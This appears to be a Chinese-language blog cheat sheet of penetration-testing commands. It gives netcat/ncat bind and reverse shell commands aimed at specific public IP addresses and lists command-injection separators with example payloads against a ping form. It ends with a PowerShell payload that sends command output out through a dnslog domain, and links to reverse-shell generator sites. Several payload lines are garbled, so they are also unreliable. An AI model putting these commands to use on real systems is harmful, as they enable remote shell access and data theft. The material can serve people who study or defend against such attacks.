-
渗透常用命令
https://blog.csdn.net/weixin_43303273/article/details/83029138 -
文件上传下载:
不同操作系统中的文件下载命令,命令生成:https://forum.ywhack.com/bountytips.php?download -
生成反弹 shell 命令
https://forum.ywhack.com/shell.php -
远程连接操作系统
- 正向连接:本地监听等待连接
Linux控制Windows
- 正向连接:本地监听等待连接
// Windows绑定CMD到本地5566端口
nc -e cmd lvp 5566
//Linux主动连接目标5566
ncat 47.122.23.131 5566
- 2、反向连接:主动给出去控制权限/服务/能力,对方监听
//本地等待5566连接
nc -lvvp 5566
//受控方,给出权限到指定 IP:绑定CMD到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566
//等待5566连接
ncat -lvvp 5566
//受控方,给出权限到指定 IP:绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566
公网机器控制内网某一个机器的情况,只能使用反向连接
实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
有一个网页,对应服务器是 windows 且可以输入 ip 地址并回显 ping
image.png
管道符:|(管道符号)1(逻辑或)&&(逻辑与)&(后台任务符号)
Windows->|& &&、'(特有`和;)
Linux->;||| & &&
例子:
ping-c1127.0.0.1;whoami
ping -c1127.0.0.1| whoami
ping -c1127.0.0.1l whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1127.0.0.1 && whoami
ping -c 1 127.0.0.1whoami
- 该方法受防火墙的出站入站规则影响
- 数据不回显的情况
使用dnslog 工具,让对方把结果放在ping 的域名前缀中,dnslog 工具提供 ping 的域名和 dns 查询记录;
// 语句示例
127.0.0.1| powershell $x=whoami;$x=$x.Replace("',’xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z












网友评论